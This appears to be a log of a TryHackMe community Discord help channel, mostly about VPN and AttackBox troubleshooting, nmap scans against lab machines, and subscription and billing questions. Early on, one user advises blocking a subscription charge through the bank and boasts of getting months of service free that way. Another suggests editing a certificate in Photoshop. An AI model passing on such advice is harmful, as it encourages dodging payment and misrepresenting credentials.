how can i find the tool that was used to get windows password?

gleaming flume
#

In what context? Was this a tool mentioned in a tryhackme room or what?

gleaming flume
scenic torrentBOT
#

Gave +1 Rep to @gleaming flume (current: #41 - 195)

fleet pine
#

Is anyone experiencing error 500 while submitting ansewers? This is happening to me in a room I'm developing. I saved the request in HAR in case the error does not go away soon for debugging purposes.

#

It must be an issue with my room, since for instance nothing strange happens in the new jwts room

fleet pine
#

Solved by deleting question and answer and reinserted it. Weird

jade salmon
#

im having issues witht the windows AD room, cant RDP into this machine from the attack box?? im not a noob i use rdp daily at work so what could the issue be? im literally running the admin server thats hosting the user im RDPing into

#

Ive also tried disconnecting and reconencting that didnt work either. Its Active Directory Basics task 4

narrow hinge
#

Why does tryhackme wants to charge my card even tho i cancelled my sub 2 months agi

#

Or a month

jade salmon
#

call your bank and tell them to block the charge

#

did that with ACI learning and got almost 6 months for free bc the account was still active

#

@narrow hinge

narrow hinge
#

They dont get the money but alr thx

weary spindle
narrow hinge
#

Later

upbeat quarry
misty badger
#

I have the coupon code from DEFCON and am trying to redeem it (had to let me current subscription expire before using it). It does not seem to work in the coupon field or in the ‘redeem voucher’ field in the profile -> subscription section?

weary spindle
misty badger
weary spindle
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

wind wedge
#

Expired on 31st August

weary spindle
#

Ah that explains it,.thanks Blackout

cedar rock
#

is there any way to get premium for 2 weeks just to try it without paying or anth cause i still didnt get my pay check and running on low budget rn (just tryna solve more machines)

weary spindle
thorn fox
#

is there a known issue with openvpn and mac.os with the platform ? (and maybe a fix )

weary spindle
cedar rock
#

how to see whats the room i joined but didnt complete?

weary spindle
weary spindle
silver zealot
#

Hi all. I have an issue with connection through openVPN. I can connect through the steps instructed, and I do get a green connection on the openVPN access page.
Yet, I get a red "Access Machine" on the room page, and can't access the room target machine (even though I am connected through openVPN, as I can access 10.10.10.10). Is there something I am missing?

silver zealot
#

I am doing the Nmap tutorial, Complete Beginner
Network Exploitation Basics
Nmap

#

If I use a command on the attackbox, it works. If I do the same on my machine, it says I can't reach

weary spindle
silver zealot
#

I get

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 11:30 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds

#

Command being : sudo nmap -sX -p1-999 10.10.XX.XXX // (my target machine local IP)

#

The Attackbox, with the exact same command, returns the correct result :

Starting Nmap 7.60 ( https://nmap.org ) at 2024-09-18 16:46 BST
Nmap scan report for ip-10-10-56-218.eu-west-1.compute.internal (10.10.56.218)
Host is up (0.00042s latency).
All 999 scanned ports on ip-10-10-56-218.eu-west-1.compute.internal (10.10.56.218) are open|filtered

cedar rock
#

can an admin/staff mention each badge and what room it need to be completed?

#

in the past 48h i spent exactly 39h hacking machines so id appreciate it to draw a path

weary spindle
#

You know the host is up.

weary spindle
civic sedge
#

hi

mighty bloom
#

Hello everybody, i think there is a bug in the file inclusion room,After i open the attack box the room doesn't allow me to open to start the machine for the ip target address.

civic sedge
#

can anyone send me changing country link

mighty bloom
#

i don't have any other opened machine

#

@west chasm , @marble breach

cedar rock
weary spindle
#

You do

mighty bloom
silver zealot
weary spindle
silver zealot
#

Oh, I mean I did not since I am not worried about the command itself, but the fact that it works on the attackbox but not my machine

jaunty sedge
#

hi

#

anyone done the advent of cyber 2023 ??

#

i have done but i didnt get any certificate

silver zealot
weary spindle
#

It blocks ICMP pings by default

silver zealot
#

Ah, I am running a VM, I didn't think that the host OS could be blocking the VM. It's a good lesson then! Thanks for the insight

weary spindle
silver zealot
# weary spindle The attackbox is on the same network, so ARP takes over, and allows the scans.

I'm really starting so excuse me if it's obvious, but let me try to clarify your answer to seee if I understand. You mean that actually the target is Windows, hence it blocks the incoming ping, but the attackbox is on the same network so ARP works.
I tried OS identification, there is no OS match but there seem to be some clues that it might indeed be Windows (Some ports running windows services for example).

#

And it might be trivial, but I thought that because of connection with the VPN, I would be considered on the same network of the target machine, hence having ARP too

hollow wharf
#

hi

#

is this possible to change our discord token on the website?

silver zealot
# weary spindle Yeah, that's exactly it.

Great thanks for the answers and guidance. It would have been easier for me if I listened better to the advices of "-vv" and saw that ARP switch sooner! Another lessons learnt

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #1 - 2772)

weary spindle
weary spindle
hollow wharf
weary spindle
final fern
#

I'm trying to do threat intelligence tools scenario 1 and for this question: "From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..." there is no detection alias on Talos that starts with an H

hollow wharf
weary spindle
vital parrot
#

Hi! I'm not sure if this is the best place to ask, but I just finished the Complete Beginner Path. The certificate says I completed the path in around 16 hours but I'm sure it took me closer to 90 hours. Any idea why there's such a discrepancy? Thanks!

jade salmon
astral night
#

how do i switch between paths on thm? ive started a few paths, but i dont know how yo switch from one toa nother

upbeat quarry
jade salmon
#

It’s just not very straight forward for a walkthrough. I could have figured it out eventually but it doesn’t say anything about using an RDP application on the attack box. Very confusing. I’d recommend adding that bit of info to the room. Other than that it’s working fine!!😌👌

winter lynx
#

Hello everyone. I'm trying to pay for the premium subscription on TryHackMe, but the payment won't go through. It says that the card issuer won't allow the payment. I've tried multiple cards, all of which normally work on other platforms. I even tried PayPal, but no luck. I was wondering if this could be related to the TryHackMe platform? Has anyone experienced something similar?

weary spindle
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

smoky sparrow
#

Hey, I have downloaded Breaching-AD openvpn configuration file and then connected with it, but it still shows disconnected on access page. Also, am not able to ping the DC machine.

weary spindle
clear needle
#
PING 10.10.232.45 (10.10.232.45) 56(84) bytes of data.
64 bytes from 10.10.232.45: icmp_seq=1 ttl=63 time=311 ms
64 bytes from 10.10.232.45: icmp_seq=2 ttl=63 time=312 ms
^C
--- 10.10.232.45 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 311.215/311.761/312.307/0.546 ms
daft@kali:~$ wget 10.10.232.45
--2024-09-19 10:01:07--  http://10.10.232.45/
Connecting to 10.10.232.45:80... connected.
HTTP request sent, awaiting response...```

im connected to vpn booted up a vm can ping it nmap shows port 80 open but the website does not load.
upbeat quarry
clear needle
#

it loads very slow....

upbeat quarry
west chasmBOT
clear needle
#

i look at it. It was working for daysbefore today.

#
10.21.44.123daft@kali:~$```
#

strange i can now curl in cli (of my debian machine) but my kali docker (you cant install kali on a pi vm anymore) still does not load.

upbeat quarry
clear needle
#

yeah. i reloaded openvpn with systemcl

weary spindle
#

White screen?

#

sudo ip link set mtu 1200 dev tun0 if so

clear needle
#

changed mtu from 1500 to 1200 no diffrence.

I get the title in my browser tab but blank page.

#

traceroute shows no stange paths. I can navigate other pages fine.

weary spindle
#

Then it's something on your end or give it more time

clear needle
#

but 10.10.10.10 works fine how can it still be my side?

#

ssh to the ctf vm works.

#

only no port 80. I have no port 80 filters on my side for sure.

weary spindle
#

Because port 80 works on my side

clear needle
#

yes but 10.10.10.10 works on my side. also. So if it was my side that would not work.

#

o dear disabled ipv6 on my home lab and its not comming back up :/

weary spindle
clear needle
#

then tell my how it can be on my side while its a diffrent ip on the tryhackme network.

weary spindle
#

I could access it.

clear needle
weary spindle
clear needle
#

yup.

#

it worked and now it doesnt. the only thing that is diffrent from my machine to your machine is that i connect to the website over a docker instance.
but i can rearch the local network. perhaps there is some ip forward filter enabled the last few days

vocal iron
#

Hi, I know that this problem was there for a long time but I cannot download the VPN configuration for the Holo network
I tried to logoff-on, regenerate, waited few days, .... but everytime I want to download the VPN configuration for the Holo machine, I have a 0 line OpenVPN .ovpn file

north marsh
#

What is even happening

#

had this 4 times in 15 mins already

weary spindle
north marsh
# weary spindle Have you visited the page?

I did and it's mentioning that should be a rare occasion, that's what confused me. Anyway seems to be fine. I thought that's something that would only happen to free members

atomic nest
#

Do we keep access to subscriber only rooms if we let a subscription lapse ?

#

or do they get locked out ?

upbeat quarry
# vocal iron Hi, I know that this problem was there for a long time but I cannot download the...

I cannot even download the VPN file: the download button spins for 1 minutes (same for the regenerate button)
the problem with Holo network has been acknowledged here:
#holo-network message
however, my impression when you read the messages of that channel, is that things work for some users
also I think that, if you want a format feedback from THM, you should open a support ticket: document as much as possible (screenshots, etc.) including the subnet or subnets you have been assigned when trying

vocal iron
#

why do we even need to do such a ticket

#

they can just fix the problem for everyone! 😂

upbeat quarry
# vocal iron why do we even need to do such a ticket

of course you do not need, but realize that THM Discord is mainly a community of THM users
next to that, THM organizes support (email, chatbot) and I believe that is the interface to talk to THM
between Discord and support, you do see THM staff interacting in Discord, but I do not think you can be sure they will read and react to your messages

untold agate
#

it's still taking very long as a non-root user

upbeat quarry
# untold agate hello, could you share the screenshot for the second scan

see screenshot: there are 3 windows:

  • top window: running as root, taking for ever (and actually still running as I type about 10 minutes after starting)
  • middle window: running as ubuntu (i. e. non-root: that user exists when you start THM AttackBox): same command as top window, with results in 2.55 seconds
  • bottom window: running as root, but with the -sT flag, which is the default one when you run nmap as non-root; so it is equivalnet to the middle window, and this is evidenced by the fact that it took 2.39 seconds there too
untold agate
#

how to upload images to this server

untold agate
#

it says this then doesn't do anything

upbeat quarry
# untold agate Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:16 +08

you should verify with Discord so that you can share screenshots: see link coming next
also, please do not mulitpost: it is a duplication of efforts
about nmap not doing anything, you can ask nmap for progress by pressing the space bar anytime (and actually nearly any key)
you can also add verbosity on the fly by pressing v or reduce verbosity by pressing V
have you started nmap as non-root, or as root with -sT?

west chasmBOT
wind wedge
north marsh
scenic torrentBOT
#

Gave +1 Rep to @wind wedge (current: #52 - 154)

median mango
#

Seeing this error when launching the Attack Box. Can't be closed. Relaunching isn't fixing it, been like this for 2-3 days. Any ideas?

thmVNC encountered an error:

Loading chunk 5 failed.
(undefined: undefined)
@webkit-masked-url://hidden/:1:4672
@webkit-masked-url://hidden/:1:2992
reduce@[native code]
@webkit-masked-url://hidden/:1:2976
@webkit-masked-url://hidden/:1:5604
t@webkit-masked-url://hidden/:1:5637
@webkit-masked-url://hidden/:1:5722
i@webkit-masked-url://hidden/:1:5755
@webkit-masked-url://hidden/:1:6255
@webkit-masked-url://hidden/:1:6315
dispatchEvent@[native code]
@webkit-masked-url://hidden/:1:5931
c@webkit-masked-url://hidden/:1:5935
@webkit-masked-url://hidden/:1:6319
@webkit-masked-url://hidden/:1:6662
global code@webkit-masked-url://hidden/:1:6674

frail adder
#

Dear tryhackme, now I am using montly subscription and it's going to expire soon. I would like to acquire how I can change from normal to student discount as an college student. Thank you

uncut cipher
#

Trying to subscribe to the monthly plan

What is this error?

weary spindle
frail adder
delicate eagle
#

Hi can someone help me with what I am doing wrong with downloading the OpenVPN config for the hololive network? It always loads for like 2 minutes, then states „An unknown error has occurred“. Regenerating the config and leaving / joining Holo again does not resolve the issue for me

#

Did someone have similar issues?

upbeat quarry
delicate eagle
scenic torrentBOT
#

Gave +1 Rep to @upbeat quarry (current: #47 - 169)

cerulean oracle
#

someone in my workspace has 32 points accumulated this month, but nobody has purchased access to the workspace assignments. How is that possible?

wind wedge
cerulean oracle
wind wedge
#

Ahh sorry should have been more specific, Yep that’s correct. If a challenge is over a month it wil score 25% of the points and for walkthroughs over a month don’t count

#

For challenges and walkthroughs under a month score full points

cerulean oracle
#

interesting thanks

west chasmBOT
twilit prairie
#

hello

#

can we install the attack machine ubuntu

#

that tryhackme have

naive dust
#

guys i have bought a voucher on tryhackme, but the code didnt sent to my email, where i can see it ?

covert stirrup
#

Dear Staff, I am using openvpn to solve the room with wsl kali. However, I found that openvpn is not connected in the company firewall. (Mobile hotspot is not connected well) To solve this, I will ask the company firewall person to modify the policy, which rule set should I ask for? Tryhackme site access is good, but when I open the openvpn file, there is an ip in the remote variable, should I ask them to allow it?

untold agate
#

Does that not work?

ivory spruce
west chasmBOT
#

@naive dust

TryHackMe's Email

TryHackMe's support email address.

ivory spruce
ivory spruce
covert stirrup
ivory spruce
covert stirrup
ivory spruce
# untold agate Does that not work?

It will still work, but it may not be as effective when running it as root. There are certain privileges required by nmap to do additional scanning tests such as opening sockets, etc.

ivory spruce
naive dust
#

guys could someone help me with this problem?
im unable to login using ssh. It keeps saying permission denied

ivory spruce
# untold agate it still takes >10 minutes

There are a couple of factors that could affect the speed by which nmap scans get completed such as internet speed, the distance the packets travel from your location to the destination, the resources the target machine has, etc.).

ivory spruce
# naive dust

You are connecting to the Attackbox IP. Have you clicked on the green Start Machine button anywhere on the task?

naive dust
#

yes i have

#

it worked yesterday but today when I tried to login it wont work

ivory spruce
naive dust
#

oh nvm

#

i got it

#

thank you for the help @ivory spruce

scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 692)

wind wedge
upbeat quarry
# untold agate it still takes >10 minutes

it would be interesting to add to that picture the latency you have by showing the output of ping <ip>
(cfr. the response you got to this message from @ivory spruce )
also, doing -T5 over the VPN may be more confusing than helpful
so far, the screenshots I shared showed nmap done from the AttackBox and the better speed with -sT
so, I thought I would compare AttackBox with Kali through the VPN (see screenshot):

  • on the right: the Attackbox with results similar to before
  • on the left: Kali through the VPN
    • I have a latency of about 30 ms
    • nmap for the whole range of ports take about the same time whether root or non-root
      So, it turns out that, for me with Kali through the VPN, I have a decent response time for both nmap commands, and somehow a better experience than with the AttackBox
      I cannot explain that difference
      The take away from this for me at this stage: if one nmap command takes too much time, I would try the other one
untold agate
ivory spruce
untold agate
#

my server is in a different region, so i guess it makes sense

misty lodge
#

hello can someone help i get

untold agate
weary spindle
#

-T5 can miss ports

untold agate
#

i'm trying to change server but it's always saying not connected on the access page

#

even though i regenerated the configuration file

untold agate
#

is there a way to close all of them

#

i don't know which configuration file it's from

upbeat quarry
west chasmBOT
untold agate
#

can free users keep extending the target machine infinitely?

weary spindle
#

6 hours is the max

#

For everyone

opaque swift
#

Hello everyone! I'm an educator based in the US. I just purchased eight seats and assigned students and myself to them, but I still can't progress in the path I was having a look at (intro to pentesting) and in the dashboard it says that there are 7/7 users left to join. I haven't received an email to join yet and have checked my spam folder.

untold agate
weary spindle
weary spindle
untold agate
#

i changed my region to a nearer one but the scan still takes very long

#

my internet has a latency of 5 ms

upbeat quarry
upbeat quarry
# untold agate how do i find that

ping -c 10 10.10.10.10: this will send 10 ICMP echo requests to 10.10.10.10 IP address once you have connected to THM VPN
the output will give a time in second ms: that is the latency

untold agate
upbeat quarry
# untold agate it's approximately 190 ms 💀

190 ms is not great, but there is worse
I have 30 ms
that latency would be the criteria to evaluate the quality of the different VPN servers you can try: if the one furthest to you has a better latency, go for that one
finally: are you on cable or any kind of wireless?

untold agate
#

is there any way to compare the latency of the different servers without actually going on them

opaque swift
weary spindle
#

Sorry to hear that, but THM will get back and support you.

upbeat quarry
unborn forge
#

Hi, I tried to start "Crack the hash" room(supposed to free) but I can't deploy VM. Can you help me ?

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #1 - 2781)

weary spindle
spiral tartan
unborn forge
scenic torrentBOT
#

Gave +1 Rep to @spiral tartan (current: #1480 - 2)

thorn saffron
#

Could someone help me get my VM connected to tryhackme labs? Found a video for it but I switched from kali to Parrot. Parrot doesn't show my configuration down for the VPN to get everything connected

steep pelican
thorn saffron
#

Yeah, i have the VPN running and downloaded already. it is connected on tryhackme. when using my VM, some commands don't work, and I'm assuming it's because it's unable to communicate with tryhackme. so I figured this would be the solution. but the file that downloads doesnt show up in ParrotOS file explorer when in downloads

#

the vid im watching says to in the command like to type sudo tryhackme file name for the vpn

steep pelican
#

Can you share a screenshot of your connection?

But to be able to so, you have to verify your thm acc with discord. For this type "/verify" (without quotationmarks)

steep pelican
#
  1. Make sure your vm has connection with the web

  2. Download openvon (you already did)

  3. Download the vpn file from thm server that matches your region

  4. Then, you were right,
    sudo openvpn opvpnfile.opvn (im not sure about the file ending ^^ )

  5. Then ifconfig and take a look if you are connected

To ensure if you are connected & the server is up ping 10.10.10.10

#

Seems you are connected.

#

Can you ping the 10.10.10.10 ?

#

Delete it please.

#

Thanks.

thorn saffron
#

ping: socktype: SOCK_RAW
ping: socket: Operation not permitted
ping: => missing cap_net_raw+p capability or setuid?

#

thats what it gives me

#

sorry im new to a lot of this

steep pelican
icy nymph
#

Hello geeks,
I am doing OWASP top 10. But the link given for Command Injection Practical is not working or broken.
http://10.10.172.185/evilshell.php
Please advice 🙏🙏🙏

thorn saffron
#

@steep pelican ah yes I forgot that lol

#

I'll give it a try. Stepped away for a min

cedar rock
#

how can we get this

gleaming flume
#

Its manually awarded to people that just contribute to the community iirc

steep pelican
scenic torrentBOT
#

Gave +1 Rep to @gleaming flume (current: #41 - 198)

cedar rock
#

how can we get verf shown on our tryhackme profile?

keen scroll
#

verf what?

jade salmon
#

Hey, in Breaching AD room where it’s a shared network with other users is it possible that this network I’m sharing has been completely destroyed by the other users

#

I can’t access the login page

#

There only 3 days left for the room being open so I wanted to try and get it done unless it’s just old/buggy and about to be retired or something like that

cedar rock
thorn saffron
#

@cedar rock /verify and if you go the site under manage account near the bottom is your token key put into the black box beside/verify

cedar rock
#

iam verified on discord

keen scroll
cedar rock
keen scroll
#

Clicking on it should show the tooltip

cedar rock
#

+rep @keen scroll

scenic torrentBOT
#

Gave +1 Rep to @keen scroll (current: #32 - 239)

cedar rock
#

simple question simple answer rep deserved

thorn saffron
#

@steep pelican it shows ping 56(84) bytes of data. Nothing else

upbeat quarry
bronze vale
jade salmon
steep pelican
jade salmon
#

I’m at work so I’m on discord on my phone it won’t work in the DMZ

jade salmon
#

I’m on THMs network tho so it’s not that I do labs here every day

#

It just wouldn’t connect, I tried it in the browser and it said the page didn’t exist

upbeat quarry
jade salmon
#

I’m using the attack box I’m a premium user

#

Shouldn’t have to set anything else up right?

#

I ran the systemd-resolve command

#

Didn’t work

thorn saffron
#

@steep pelican the ping was still running just taking a while. so I assume its working but I don't really think that's going to help with what I need help with. the file that you downloaded doesn't show up in the file system in Parrot. so when I use the sudo openvpn filename.ovpn it has nothing to pull from with the file. so how do I get the file system(VM) to read from my own file systems.

upbeat quarry
steep pelican
jade salmon
#

Oh so can’t use the attack box for this one then

thorn saffron
#

@steep pelican yea so i see it in my downloads but when i look in my vm downloads there is nothing there

upbeat quarry
steep pelican
thorn saffron
#

@steep pelican can i screen share with you. so you can see what im seeing?

#

@steep pelican how do you do that?

steep pelican
#

. Download the file.

thorn saffron
#

ohhhhhh so the browser through the vm

#

it clicked lol

steep pelican
#

Then it should be available in your cd Downloads.

thorn saffron
#

cool thank you. ill let you know if it works

steep pelican
thorn saffron
#

this stuff is so annoying to learn but so interesting

steep pelican
upbeat quarry
thorn saffron
#

@upbeat quarry I had kali and a lot of the commands I was using weren't working. one of the other discord groups I'm in for cyber also said they were having trouble with Kali and suggested Parrot. I do like the OS a bit better over kali's

upbeat quarry
scenic torrentBOT
#

Gave +1 Rep to @thorn saffron (current: #2229 - 1)

thorn saffron
#

@steep pelican so im going to need a step by step lol. the command line says Error opening configuration file: et16lryV.ovpn

#

got the file downloaded from THM but still not working

steep pelican
thorn saffron
#

@steep pelican this is whats happening

steep pelican
thorn saffron
#

does it need to be the arm one then? parrot is on amd if that makes a difference

#

like i said new to all this also meaning VMs and how to download stuff within them

steep pelican
#

I will help you with this but there is also a room in thm how to connect with the vpn. Just sayin.

thorn saffron
#

yea i think im leaving this discord server

steep pelican
# thorn saffron yea i think im leaving this discord server

I would recommend that you first familiarize yourself with your working environment. It doesn't really look like it was kali's fault that certain commands didn't work. Beside the fact parrot is also a linux based os. This is just well-intentioned advice.

twilit prairie
slate thorn
#

what would be the reason that attack machine doesnt have internet?

violet cargo
#

how do I unlink my discord token from an account?

ivory spruce
ivory spruce
ivory spruce
runic edge
#

Is there any information on why it shows not connected under access for using my kali machine but it connects to the 10. domain and shows an IP. Anyone else having this issue ? Not able to use my own machine for rooms anymore.

#

fresh install and fresh ovpn file downloaded. shows connected in terminal but not on site.

sharp condor
ivory spruce
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 694)

cerulean oracle
#

anyone know why the learning roadmap isnt showing anymore for me in the learn section and instead its just path boxes now

naive dust
viral gull
cerulean oracle
naive dust
cerulean oracle
naive dust
cerulean oracle
scenic torrentBOT
#

Gave +1 Rep to @viral gull (current: #2229 - 1)

viral gull
humble thicket
#

Why?

naive dust
scenic torrentBOT
#

Gave +1 Rep to @viral gull (current: #1480 - 2)

stiff reef
#

Hello my subscription got renewed automatically, I don't wish to continue it. Is it possible for a refund ? Since I wouldn't be having any time.

viral gull
scenic torrentBOT
#

Gave +1 Rep to @sullen echo (current: #1480 - 2)

naive dust
humble thicket
#

Why i don't have permissions for the KOTH channel?
Any idea, anybody.

viral gull
humble thicket
#

I am verified and able to post in most of the channels.

#

But not in KOTH and a few more.

viral gull
#

Not Discord Verification with phone number or something like that but you have to verify your THM account here

humble thicket
#

My bad. Thanks for this info.

viral gull
#

No problem! Glad to help 🙂

weary spindle
#

Which is done via e-mail.

naive dust
scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #1 - 2785)

cerulean oracle
#

is tryhackme ever bringing back the ticket system or something similar?

weary spindle
cerulean oracle
weary spindle
cerulean oracle
#

kk

fading pond
#

Hello guys! I have an issue with vpn. I connect, see my tun0 IP, but can't ping machine or 10.10.10.10. Sometimes, I receive 6 packets, and that's all. I try different vpn configs, networks, turning down mtu, but it didn't work.

ivory spruce
lucid apex
#

Hello. Could somebody help with THOR Lite Task 8 Question "How can you run a quick scan and store the output files in a specified location?"?? I tried thor64-lite.exe --quick -e C:\Users\user\Desktop\

royal palm
#

a bit of a funny problem but is there a way to regenerate a certificate with my name instead of my username? because I chose it at the start, but then when i entered my name to try and generate one with my name it keeps just giving me the one with my username

weary spindle
royal palm
#

right yeah that makes sense

#

welp sucks for me i guess

weary spindle
#

If you're really fussed you can always use photoshop, but they're not really "professional" so it's really up to you.

lone mirage
#

Seeing this on Windows ovpn, but THM is not picking this up, any idea?

viral gull
weary spindle
lone mirage
lone mirage
weary spindle
#

I would not suggest using your host tbh.

viral gull
weary spindle
lone mirage
viral gull
lone mirage
#

It's mostly only for RDP stuff

#

but I appreciate your warning

lone mirage
#

I like the extra resources I have on host, hard to do that on a VM, but looks like booting up a VM is the only option now

viral gull
rare gull
#

Hi Guys. I've been trying to connect to OpenVPN but it is not working for some reason

viral gull
rare gull
#

sudo ./thm-troubleshoot ─╯

 _____           _   _            _    __  __        
|_   _| __ _   _| | | | __ _  ___| | _|  \/  | ___
  | || '__| | | | |_| |/ _` |/ __| |/ / |\/| |/ _ \
  | || |  | |_| |  _  | (_| | (__|   <| |  | |  __/
  |_||_|   \__, |_| |_|\__,_|\___|_|\_\_|  |_|\___|
           |___/

Looks like you're running Arch @MuirlandOracle

[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] MTU value failed at 1000, aborting MTU check
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

#

I ran the script too

weary spindle
rare gull
#

EU-VIP-1

#

Linux sancorp 6.10.10-arch1-1 #1 SMP PREEMPT_DYNAMIC Thu, 12 Sep 2024 17:21:02 +0000 x86_64 GNU/Linux

#

Arch Linux

#

No UFW or any firewall installed

weary spindle
#

Which country do you reside in?

rare gull
#

I reside in India

viral gull
#

Oh he uses Arch btw

NotLikeThis Sorry had to do it. Just ignore me.

rare gull
#

I tried kinda everything

#

15: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.14.160/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::109e/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::e600:ff19:33c0:7187/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever

#

I get the IP too

#

but no ping to 10.10.10.10

rare gull
#

other VPNs are working fine. regenerated the VPN config too

#

tried different servers too

#

I just can't connect 😦

lone mirage
#

Strange, happening to me on Kali VM too, this was working just a few days ago

#

This is running

violet cargo
#

I need help from a mod

weary spindle
weary spindle
violet cargo
weary spindle
violet cargo
weary nexus
#

the website stuck and wont load inside kali linux firefox, but other websites work fine.

urban cosmos
#

what do you recommend to improve my privacy when browsing other than a vpn? I am currently using google chrome

ivory spruce
pallid haven
#

2024-09-22 00:57:36 SIGUSR1[soft,tls-error] received, process restarting
2024-09-22 00:57:36 Restart pause, 1 second(s)

#

why is that

#

2024-09-22 00:58:37 TLS Error: TLS handshake failed

ivory spruce
ivory spruce
pallid haven
#

changed to EU US IN still the same output

ivory spruce
pallid haven
#

china

#

🥲

#

is that the issue?

ivory spruce
pallid haven
#

i can play this years ago

#

firewall updated?

ivory spruce
#

China has been cracking down on "unregistered" VPNs so the issue isn't on the THM side.

pallid haven
#

i connect to a US vpn server and tried connect thm

ivory spruce
#

The only option available would be using the Attackbox.

pallid haven
#

oh i can buy vip

viscid cedar
#

I can't find a chat window on the web app and no one replies when I send an email to support!

viscid cedar
weary spindle
#

I'm not THM staff.

#

I asked when did you E-mail, not what is your email.

weary spindle
weary spindle
scenic torrentBOT
#

Gave +1 Rep to @viscid cedar (current: #2231 - 1)

weary spindle
#

If that's any use.

fading pond
ivory spruce
#

VPNs are banned in Russia.

fading pond
ivory spruce
#

Noticed that you are a subscriber so you can still connect via Attackbox though it isn't as friendly as having your own local VM.

fading pond
#

I know, but its extremely slow...

lavish rivet
#

Ive been using openvpn installed and running in windows but im using wsl kali for thm should i actually install openvpn and use it in wsl kali or does it not matter?

daring sapphire
#

HI

#

I need some help

#

this only allows me access from the ip

ivory spruce
molten talon
#

Hello im new here and i really need help in a room i am in called Summit

daring sapphire
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #11 - 696)

wraith depot
#

Hello, I have a problem with the machine for windwos forensic 2. It freezes and tells me that the connection is not good even though it works perfectly. Thank you

weary spindle
#

Are you trying to SSH in?

wraith depot
weary spindle
wraith depot
#

From the attackbox

weary spindle
#

Do you also have the Windows machine in an open window?

wraith depot
#

it tells me that the server is taking too long to respond and it disconnects me

#

I tested the apartment window and the window directly on the site (divided in two).

upbeat quarry
upbeat quarry
raw gulch
#

Good morning, a question, I'm in the holo module but it won't let me download the openvpn file. Maybe I have to configure my kali machine in a different way?

#

Or can you guide me how the Holo network works so that it works from Kali, the other VPN configurations work without problems but I cannot download the Hololive .ovpn file

#

Or is it a payment in addition to the annual subscription I have?

weary nexus
#

The issue was only inside kali linux using firefox

#

On safari it’s working without any issue

modest hazel
#

Hey wondered if anyone could help me get openvpn working on Linux. I can't connect using the normal method. I tried the troubleshooting script that says this:

#

[+] Stable internet connection
[+] OpenVPN is installed
[-] tun0 interface does not exist
Would you like the script to attempt a connection automatically (Y/n)? y
[+] Connecting....
[Warning!] Connection process is taking longer than expected to complete
[-] Failed to connect
Failure to connect to the VPN can usually be solved by one of the following options:
-Regenerating your OpenVPN config on the TryHackMe access page (https://tryhackme.com/access)
-Switching servers, then regenerating your OpenVPN config
-Checking your system time. If your system time is incorrect then this can cause issues with the authentication process
If none of these methods work, please ask for further assistance in the TryHackMe Discord server, subreddit or forums.
[-] Exiting

#

I've done all the things it says to try